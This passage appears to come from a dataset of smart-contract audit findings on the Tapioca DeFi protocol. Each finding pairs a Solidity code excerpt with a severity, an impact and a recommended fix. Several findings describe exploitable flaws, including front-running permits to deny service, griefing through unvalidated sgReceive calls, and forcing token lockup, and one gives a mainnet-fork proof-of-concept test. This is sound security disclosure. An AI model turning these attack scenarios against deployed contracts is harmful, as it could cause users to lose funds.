withdrawal may return different from the actual withdrawn token amount, because the states of YieldBox has changed. Because the token amount is calculated with rounding down in YieldBox, `leverageAmount` will be higher than the actual withdrawn amount.\\nFor example, before the withdrawal, YieldBox had 100 total shares and 109 total tokens. Now this function attempt to withdraw 10 shares (calldata_.share = 10) -> the actual withdrawn amount = 10 * 109 / 100 = 10 tokens After that, leverageAmount will be calculated based on the new yieldBox's total shares and total tokens -> leverageAmount = 10 * (109 - 10) / (100 - 10) = 11 tokens\\nThe same vulnerability exists in `BBLeverage.sellCollateral` function.ч`leverageAmount` should be obtained from the return value of YieldBox.withdraw:\\n```\\n(uint256 leverageAmount, ) = yieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\n```\\nчBecause `leverageAmount` can be higher than the actual withdrawn collateral tokens, `leverageExecutor.getAsset()` will revert due to not having enough tokens in the contract to pull. This results in a DOS of `sellCollateral`, break this functionality.ч```\\nyieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\nuint256 leverageAmount = yieldBox.toAmount(collateralId, calldata_.share, false);\\n\\namountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), leverageAmount, calldata_.from, calldata_.data\\n);\\n```\\n -mTOFTReceiver MSG_XCHAIN_LEND_XCHAIN_LOCK unable to executeчmediumчIn `mTOFTReceiver._toftCustomComposeReceiver(uint16 _msgType)` If `_msgType` is processed normally, the method must return `true`, if it returns `false`, it will trigger `revert InvalidMsgType()` But when `_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` is executed normally, it does not correctly return `true` This causes this type of execution to always fail\\nThe main execution order of `_lzCompose()` is as follows:\\nIf msgType_ == MSG_REMOTE_TRANSFER, execute `_remoteTransferReceiver()`\\nOtherwise, execute `_extExec(msgType_, tapComposeMsg_)`\\nOtherwise, execute `tapiocaOmnichainReceiveExtender`\\nOtherwise, execute `_toeComposeReceiver()`\\nIf the 4th step `_toeComposeReceiver()` returns false, it is considered that the type cannot be found, and `revert InvalidMsgType(msgType_);` is triggered\\nthe code as follows:\\n```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n```\\n\\nThe implementation of `mTOFTReceiver._toeComposeReceiver()` is as follows:\\n```\\ncontract mTOFTReceiver is BaseTOFTReceiver {\\n constructor(TOFTInitStruct memory _data) BaseTOFTReceiver(_data) {}\\n\\n function _toftCustomComposeReceiver(uint16 _msgType, address, bytes memory _toeComposeMsg)\\n internal\\n override\\n returns (bool success)\\n {\\n if (_msgType == MSG_LEVERAGE_UP) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTMarketReceiver),\\n abi.encodeWithSelector(TOFTMarketReceiverModule.leverageUpReceiver.selector, _toeComposeMsg),\\n false\\n );\\n return true;\\n } else if (_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTOptionsReceiver),\\n abi.encodeWithSelector(\\n TOFTOptionsReceiverModule.mintLendXChainSGLXChainLockAndParticipateReceiver.selector, _toeComposeMsg\\n ),\\n false\\n );\\n //@audit miss return true\\n } else {\\n return false;\\n }\\n }\\n}\\n```\\n\\nAs mentioned above, because `_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` does not return `true`, it always triggers `revert InvalidMsgType(msgType_);`ч```\\ncontract mTOFTReceiver is BaseTOFTReceiver {\\n constructor(TOFTInitStruct memory _data) BaseTOFTReceiver(_data) {}\\n\\n function _toftCustomComposeReceiver(uint16 _msgType, address, bytes memory _toeComposeMsg)\\n internal\\n override\\n returns (bool success)\\n {\\n if (_msgType == MSG_LEVERAGE_UP) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTMarketReceiver),\\n abi.encodeWithSelector(TOFTMarketReceiverModule.leverageUpReceiver.selector, _toeComposeMsg),\\n false\\n );\\n return true;\\n } else if (_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTOptionsReceiver),\\n abi.encodeWithSelector(\\n TOFTOptionsReceiverModule.mintLendXChainSGLXChainLockAndParticipateReceiver.selector, _toeComposeMsg\\n ),\\n false\\n );\\n// Add the line below\\n return true;\\n } else {\\n return false;\\n }\\n }\\n}\\n```\\nч`_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` `TOFTOptionsReceiver.mintLendXChainSGLXChainLockAndParticipateReceiver()` unable to execute successfullyч```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n```\\n -Multiple contracts cannot be pausedчmediumчFor safety, tapioca has added `whenNotPaused` restrictions to multiple contracts But there is no method provided to modify the `_paused` state If a security event occurs, it cannot be paused at all\\nTake `mTOFT.sol` as an example, multiple methods are `whenNotPaused`\\n```\\n function executeModule(ITOFT.Module _module, bytes memory _data, bool _forwardRevert)\\n external\\n payable\\n whenNotPaused\\n returns (bytes memory returnData)\\n {\\n// rest of code\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n```\\n\\nBut the contract does not provide a `public` method to modify `_paused` Note: `Pausable.sol` does not have a `public` method to modify `_paused`\\nIn reality, there have been multiple reports of security incidents where the protocol side wants to pause to prevent losses, but cannot pause, strongly recommend adding\\nNote: The following contracts cannot be paused\\nmTOFT\\nTOFT\\nUsdo\\nAssetToSGLPLeverageExecutorч```\\n// Add the line below\\n function pause() external onlyOwner{\\n// Add the line below\\n _pause();\\n// Add the line below\\n }\\n\\n// Add the line below\\n function unpause() external onlyOwner{\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\nчDue to the inability to modify `_paused`, it poses a security riskч```\\n function executeModule(ITOFT.Module _module, bytes memory _data, bool _forwardRevert)\\n external\\n payable\\n whenNotPaused\\n returns (bytes memory returnData)\\n {\\n// rest of code\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n```\\n -Composing approval with other messages is subject to DoSчmediumч`TOFT::sendPacket` function allows the caller to specify multiple messages that are executed on the destination chain. On the receiving side the `lzCompose` function in `TOFT` contract can be DoS-ed by front-running the approval message and causing the `lzCompose` to revert. As `lzCompose` is supposed to process several messages, this results in lost fee paid on the sending chain for executing the subsequent messages and any value or gas airdropped to the contract.\\n`TOFT::sendPacket` allows the caller to specify arbitrary `_composeMsg`. It can be a single message or multiple composed messages.\\n```\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused // @audit Pausing is not implemented yet.\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n (msgReceipt, oftReceipt) = abi.decode(\\n _executeModule(\\n uint8(ITOFT.Module.TOFTSender),\\n abi.encodeCall(TapiocaOmnichainSender.sendPacket, (_lzSendParam, _composeMsg)),\\n false\\n ),\\n (MessagingReceipt, OFTReceipt)\\n );\\n }\\n```\\n\\nIf we observe the logic inside the lzCompose:\\n```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n\\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n _lzCompose(address(this), _guid, nextMsg_);\\n }\\n }\\n```\\n\\nAt the beginning of the function bytes memory `tapComposeMsg_` is the message being processed, while `bytes memory nextMsg_` are all the other messages. `lzCompose` will process all the messages until `nextMsg_` is empty.\\nA user might want to have his first message to grant approval, e.g. `_extExec` function call, while his second message might execute `BaseTOFTReceiver::_toeComposeReceiver` with `_msgType == MSG_YB_SEND_SGL_BORROW`.\\nThis is a problem as there is a clear DoS attack vector on granting any approvals. A griever can observe the permit message from the user and front-run the `lzCompose` call and submit the approval on the user's behalf.\\nAs permits use nonce it can't be replayed, which means if anyone front-runs the permit, the original permit will revert. This means that `lzCompose` always reverts and all the gas and value to process the `BaseTOFTReceiver::_toeComposeReceiver` with `_msgType == MSG_YB_SEND_SGL_BORROW` is lost for the user.ч`TOFT::sendPacket` should do extra checks to ensure if the message contains approvals, it should not allow packing several messages.чWhen user is granting approvals and wants to execute any other message in the same `lzCompose` call, the attacker can deny the user from executing the other message by front-running the approval message and causing the `lzCompose` to revert. The impact is lost fee paid on the sending chain for executing the subsequent messages and any value or gas airdropped to the contract. This is especially severe when the user wants to withdraw funds to another chain, as he needs to pay for that fee on the sending chain.ч```\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused // @audit Pausing is not implemented yet.\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n (msgReceipt, oftReceipt) = abi.decode(\\n _executeModule(\\n uint8(ITOFT.Module.TOFTSender),\\n abi.encodeCall(TapiocaOmnichainSender.sendPacket, (_lzSendParam, _composeMsg)),\\n false\\n ),\\n (MessagingReceipt, OFTReceipt)\\n );\\n }\\n```\\n -StargateRouter cannot send payloads and rebalancing of ERC20s is brokenчmediumчThe `Balancer.sol` contract can't perform the rebalancing of ERC20s across chains as the Stargate router is not able to send any payload and will immediately revert the transaction if a payload is included. In this instance payload is hardcoded to `\"0x\"`.\\n`Balancer.sol` contract has a `rebalance` function that is supposed to perform a rebalancing of `mTOFTs` across chains. In case the token being transferred through Stargate is an ERC20 it is using the Stargate router to initiate the transfer. The issue however is that the stargate router is not able to send any payload and will immediately revert the transaction if a payload is included.\\nIf we take a look at the code, there is a payload equal to \"0x\" being sent with the transaction:\\n```\\n## Balancer.sol\\n\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\" => this is the payload that is being sent with the transaction\\n );\\n```\\n\\nAs a proof of concept we can try to send a payload through the stargate router on a forked network and see that the transaction will revert. p.s. make sure to run on it on a forked network on Ethereum mainnet.\\n```\\nfunction testStargateRouterReverting() public {\\n vm.createSelectFork(vm.envString(\"MAINNET_RPC_URL\"));\\n \\n address stargateRouter = 0x8731d54E9D02c286767d56ac03e8037C07e01e98;\\n address DAIWhale = 0x7A8EDc710dDEAdDDB0B539DE83F3a306A621E823;\\n address DAI = 0x6B175474E89094C44Da98b954EedeAC495271d0F;\\n IStargateRouter.lzTxObj memory lzTxParams = IStargateRouter.lzTxObj(0, 0, \"0x00\");\\n\\n vm.startPrank(DAIWhale);\\n vm.deal(DAIWhale, 5 ether);\\n IERC20(DAI).approve(stargateRouter, 1e18);\\n IStargateRouter(stargateRouter).swap{value: 1 ether}(\\n 111, 3, 3, payable(address(this)), 1e18, 1, lzTxParams, abi.encode(address(this)), \"0x\"\\n );\\n}\\n```\\n\\nIt fails with the following error:\\nBoth `StargateRouter` and StargateComposer have the `swap` interface, but the intention was to use the `StargateRouter` which can be observed by the `retryRevert` function in the `Balancer.sol` contract.\\n```\\n## Balancer.sol\\n\\nfunction retryRevert(uint16 _srcChainId, bytes calldata _srcAddress, uint256 _nonce) external payable onlyOwner {\\n router.retryRevert{value: msg.value}(_srcChainId, _srcAddress, _nonce);\\n}\\n```\\n\\nAs this makes the rebalancing of `mTOFTs` broken, I'm marking this as a high-severity issue.чUse the `StargateComposer` instead of the `StargateRouter` if sending payloads.чRebalancing of `mTOFTs` across chains is broken and as it is one of the main functionalities of the protocol, this is a high-severity issue.ч```\\n## Balancer.sol\\n\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\" => this is the payload that is being sent with the transaction\\n );\\n```\\n -`mTOFT` can be forced to receive the wrong ERC20 leading to token lockupчmediumчDue to Stargate's functionality of swapping one token on the source chain to another token on the destination chain, it is possible to force `mTOFT` to receive the wrong ERC20 token leading to token lockup.\\nTo give an example, a user can:\\nProvide USDC on Ethereum and receive USDT on Avalanche.\\nProvide USDC on Avalanche and receive USDT on Arbitrum.\\netc.\\nThe issue here is that poolIds are not enforced during the rebalancing process. As it can be observed the `bytes memory _ercData` is not checked for its content.\\n```\\n## Balancer.sol\\n\\nfunction _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n> bytes memory _data\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n }\\n {\\n> (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n```\\n\\nIt is simply decoded and passed as is.\\nThis is a problem and imagine the following scenario:\\nA Gelato bot calls the rebalance method for `mTOFT` that has USDC as erc20 on Ethereum.\\nThe bot encodes the `ercData` so `srcChainId = 1` pointing to USDC but `dstChainId = 2` pointing to USDT on Avalanche.\\nDestination `mTOFT` is fetched from `connectedOFTs` and points to the `mTOFT` with USDC as erc20 on Avalanche.\\nStargate will take USDC on Ethereum and provide USDT on Avalanche.\\n`mTOFT` with USDC as underlying erc20 on Avalanche will receive USDT token and it will remain lost as the balance of the `mTOFT` contract.\\nAs this is a clear path for locking up wrong tokens inside the `mTOFT` contract, it is a critical issue.чThe `initConnectedOFT` function should enforce the poolIds for the src and dst chains.The rebalance function should just fetch these saved values and use them.\\n```\\n \\n@@ // Remove the line below\\n164,14 // Add the line below\\n176,12 @@ contract Balancer is Ownable {\\n * @param _dstChainId the destination LayerZero id\\n * @param _slippage the destination LayerZero id\\n * @param _amount the rebalanced amount\\n// Remove the line below\\n * @param _ercData custom send data\\n */\\n function rebalance(\\n address payable _srcOft,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n// Remove the line below\\n uint256 _amount,\\n// Remove the line below\\n bytes memory _ercData\\n// Add the line below\\n uint256 _amount\\n ) external payable onlyValidDestination(_srcOft, _dstChainId) onlyValidSlippage(_slippage) {\\n {\\n@@ // Remove the line below\\n188,13 // Add the line below\\n204,13 @@ contract Balancer is Ownable {\\n if (msg.value == 0) revert FeeAmountNotSet();\\n if (_isNative) {\\n if (disableEth) revert SwapNotEnabled();\\n _sendNative(_srcOft, _amount, _dstChainId, _slippage);\\n } else {\\n// Remove the line below\\n _sendToken(_srcOft, _amount, _dstChainId, _slippage, _ercData);\\n// Add the line below\\n _sendToken(_srcOft, _amount, _dstChainId, _slippage);\\n }\\n\\n \\n@@ // Remove the line below\\n221,7 // Add the line below\\n237,7 @@ contract Balancer is Ownable {\\n * @param _dstOft the destination TOFT address\\n * @param _ercData custom send data\\n */\\n// Remove the line below\\n function initConnectedOFT(address _srcOft, uint16 _dstChainId, address _dstOft, bytes memory _ercData)\\n// Add the line below\\n function initConnectedOFT(address _srcOft, uint256 poolId, uint16 _dstChainId, address _dstOft, bytes memory _ercData)\\n external\\n onlyOwner\\n {\\n@@ // Remove the line below\\n231,10 // Add the line below\\n247,8 @@ contract Balancer is Ownable {\\n bool isNative = ITOFT(_srcOft).erc20() == address(0);\\n if (!isNative && _ercData.length == 0) revert PoolInfoRequired();\\n \\n// Remove the line below\\n (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_ercData, (uint256, uint256));\\n// Remove the line below\\n\\n OFTData memory oftData =\\n// Remove the line below\\n OFTData({srcPoolId: _srcPoolId, dstPoolId: _dstPoolId, dstOft: _dstOft, rebalanceable: 0});\\n// Add the line below\\n OFTData({srcPoolId: poolId, dstPoolId: poolId, dstOft: _dstOft, rebalanceable: 0});\\n \\n connectedOFTs[_srcOft][_dstChainId] = oftData;\\n emit ConnectedChainUpdated(_srcOft, _dstChainId, _dstOft);\\n \\n function _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n// Remove the line below\\n uint256 _slippage,\\n// Remove the line below\\n bytes memory _data\\n// Add the line below\\n uint256 _slippage\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n// Remove the line below\\n }\\n// Add the line below\\n }\\n {\\n// Remove the line below\\n (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n// Remove the line below\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n// Add the line below\\n _routerSwap(_dstChainId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n \\n function _routerSwap(\\n uint16 _dstChainId,\\n// Remove the line below\\n uint256 _srcPoolId,\\n// Remove the line below\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n// Add the line below\\n uint256 poolId = connectedOFTs[_oft][_dstChainId].srcPoolId;\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n// Remove the line below\\n _srcPoolId,\\n// Remove the line below\\n _dstPoolId,\\n// Add the line below\\n poolId,\\n// Add the line below\\n poolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n```\\n\\nAdmin is trusted but you can optionally add additional checks inside the `initConnectedOFT` function to ensure that the poolIds are correct for the src and dst mTOFTs.чThe impact of this vulnerability is critical. It allows for locking up wrong tokens inside the mTOFT contract causing irreversible loss of funds.ч```\\n## Balancer.sol\\n\\nfunction _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n> bytes memory _data\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n }\\n {\\n> (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n```\\n -Gas parameters for Stargate swap are hardcoded leading to stuck messagesчmediumчThe `dstGasForCall` for transferring erc20s through Stargate is hardcoded to 0 in the `Balancer` contract leading to `sgReceive` not being called during Stargate swap. As a consequence, the `sgReceive` has to be manually called to clear the `cachedSwapLookup` mapping, but this can be DoSed due to the fact that the `mTOFT::sgReceive` doesn't validate any of its parameters. This can be exploited to perform a long-term DoS attack.\\nGas parameters for Stargate\\nStargate Swap allows the caller to specify the:\\n`dstGasForCall` which is the gas amount forwarded while calling the `sgReceive` on the destination contract.\\n`dstNativeAmount` and `dstNativeAddr` which is the amount and address where the native token is sent to.\\nInside the `Balancer.sol` contract, the `dstGasForCall` is hardcoded to 0. The `dstGasForCall` gets forwarded from Stargate `Router` into the Stargate `Bridge` contract.\\n```\\n function swap(\\n uint16 _chainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n Pool.CreditObj memory _c,\\n Pool.SwapObj memory _s,\\n IStargateRouter.lzTxObj memory _lzTxParams, \\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable onlyRouter {\\n bytes memory payload = abi.encode(TYPE_SWAP_REMOTE, _srcPoolId, _dstPoolId, _lzTxParams.dstGasForCall, _c, _s, _to, _payload);\\n _call(_chainId, TYPE_SWAP_REMOTE, _refundAddress, _lzTxParams, payload);\\n }\\n\\n function _call(\\n uint16 _chainId,\\n uint8 _type,\\n address payable _refundAddress,\\n IStargateRouter.lzTxObj memory _lzTxParams,\\n bytes memory _payload\\n ) internal {\\n bytes memory lzTxParamBuilt = _txParamBuilder(_chainId, _type, _lzTxParams);\\n uint64 nextNonce = layerZeroEndpoint.getOutboundNonce(_chainId, address(this)) + 1;\\n layerZeroEndpoint.send{value: msg.value}(_chainId, bridgeLookup[_chainId], _payload, _refundAddress, address(this), lzTxParamBuilt);\\n emit SendMsg(_type, nextNonce);\\n }\\n```\\n\\nIt gets encoded inside the payload that is sent through the LayerZero message. The payload gets decoded inside the `Bridge::lzReceive` on destination chain. And `dstGasForCall` is forwarded to the `sgReceive` function:\\n```\\n## Bridge.sol\\n\\n function lzReceive(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint64 _nonce,\\n bytes memory _payload\\n ) external override {\\n if (functionType == TYPE_SWAP_REMOTE) {\\n (\\n ,\\n uint256 srcPoolId,\\n uint256 dstPoolId,\\n> uint256 dstGasForCall,\\n Pool.CreditObj memory c,\\n Pool.SwapObj memory s,\\n bytes memory to,\\n bytes memory payload\\n ) = abi.decode(_payload, (uint8, uint256, uint256, uint256, Pool.CreditObj, Pool.SwapObj, bytes, bytes));\\n```\\n\\nIf it is zero like in the `Balancer.sol` contract or its value is too small the `sgReceive` will fail, but the payload will be saved in the `cachedSwapLookup` mapping. At the same time the tokens are transferred to the destination contract, which is the `mTOFT`. Now anyone can call the `sgReceive` manually through the `clearCachedSwap` function:\\n```\\n function clearCachedSwap(\\n uint16 _srcChainId,\\n bytes calldata _srcAddress,\\n uint256 _nonce\\n ) external {\\n CachedSwap memory cs = cachedSwapLookup[_srcChainId][_srcAddress][_nonce];\\n require(cs.to != address(0x0), \"Stargate: cache already cleared\");\\n // clear the data\\n cachedSwapLookup[_srcChainId][_srcAddress][_nonce] = CachedSwap(address(0x0), 0, address(0x0), \"\");\\n IStargateReceiver(cs.to).sgReceive(_srcChainId, _srcAddress, _nonce, cs.token, cs.amountLD, cs.payload);\\n }\\n```\\n\\nAlthough not the intended behavior there seems to be no issue with erc20 token sitting on the `mTOFT` contract for a shorter period of time.\\nsgReceive\\nThis leads to the second issue. The `sgReceive` function interface specifies the `chainId`, `srcAddress`, and `token`.\\nIn the current implementation, the `sgReceive` function doesn't check any of these parameters. In practice this means that anyone can specify the `mTOFT` address as the receiver and initiate Stargate Swap from any chain to the `mTOFT` contract.\\nIn conjunction with the first issue, this opens up the possibility of a DoS attack.\\nLet's imagine the following scenario:\\nRebalancing operation needs to be performed between `mTOFT` on Ethereum and Avalanche that hold `USDC` as the underlying token.\\nRebalancing is initiated from Ethereum but the `sgReceive` on Avalanche fails and 1000 USDCs are sitting on `mTOFT` contract on Avalanche.\\nA griever noticed this and initiated Stargate swap from Ethereum to Avalanche for 1 `USDT` specifying the `mTOFT` contract as the receiver.\\nThis is successful and now `mTOFT` has 1 `USDT` but 999 `USDC` as the griever's transaction has called the `sgRecieve` function that pushed 1 `USDC` to the `TOFTVault`.\\nAs a consequence, the `clearCachedSwap` function fails because it tries to transfer the original 1000 `USDC`.\\n```\\n function sgReceive(uint16, bytes memory, uint256, address, uint256 amountLD, bytes memory) external payable {\\n if (msg.sender != _stargateRouter) revert mTOFT_NotAuthorized();\\n\\n if (erc20 == address(0)) {\\n vault.depositNative{value: amountLD}();\\n } else {\\n> IERC20(erc20).safeTransfer(address(vault), amountLD); // amountLD is the original 1000 USDC\\n }\\n }\\n```\\n\\nThe only solution here is to manually transfer that 1 USDC to the `mTOFT` contract and try calling the `clearCachedSwap` again.\\nThe griever can repeat this process multiple times.чThe `dstGasForCall` shouldn't be hardcoded to 0. It should be a configurable value that is set by the admin of the `Balancer` contract.\\nTake into account that this value will be different for different chains.\\nThe recommended solution is:\\n```\\n contract Balancer is Ownable {\\n using SafeERC20 for IERC20;\\n\\n// Add the line below\\n mapping(uint16 => uint256) internal sgReceiveGas;\\n\\n// Add the line below\\n function setSgReceiveGas(uint16 eid, uint256 gas) external onlyOwner {\\n// Add the line below\\n sgReceiveGas[eid] = gas;\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n function getSgReceiveGas(uint16 eid) internal view returns (uint256) {\\n// Add the line below\\n uint256 gas = sgReceiveGas[eid];\\n// Add the line below\\n if (gas == 0) revert();\\n// Add the line below\\n return gas;\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Remove the line below\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n// Add the line below\\n IStargateRouterBase.lzTxObj({dstGasForCall: getSgReceiveGas(_dstChainId), dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n```\\nчHardcoding the `dstGasCall` to 0 in conjuction with not checking the `sgReceive` parameters opens up the possibility of a long-term DoS attack.ч```\\n function swap(\\n uint16 _chainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n Pool.CreditObj memory _c,\\n Pool.SwapObj memory _s,\\n IStargateRouter.lzTxObj memory _lzTxParams, \\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable onlyRouter {\\n bytes memory payload = abi.encode(TYPE_SWAP_REMOTE, _srcPoolId, _dstPoolId, _lzTxParams.dstGasForCall, _c, _s, _to, _payload);\\n _call(_chainId, TYPE_SWAP_REMOTE, _refundAddress, _lzTxParams, payload);\\n }\\n\\n function _call(\\n uint16 _chainId,\\n uint8 _type,\\n address payable _refundAddress,\\n IStargateRouter.lzTxObj memory _lzTxParams,\\n bytes memory _payload\\n ) internal {\\n bytes memory lzTxParamBuilt = _txParamBuilder(_chainId, _type, _lzTxParams);\\n uint64 nextNonce = layerZeroEndpoint.getOutboundNonce(_chainId, address(this)) + 1;\\n layerZeroEndpoint.send{value: msg.value}(_chainId, bridgeLookup[_chainId], _payload, _refundAddress, address(this), 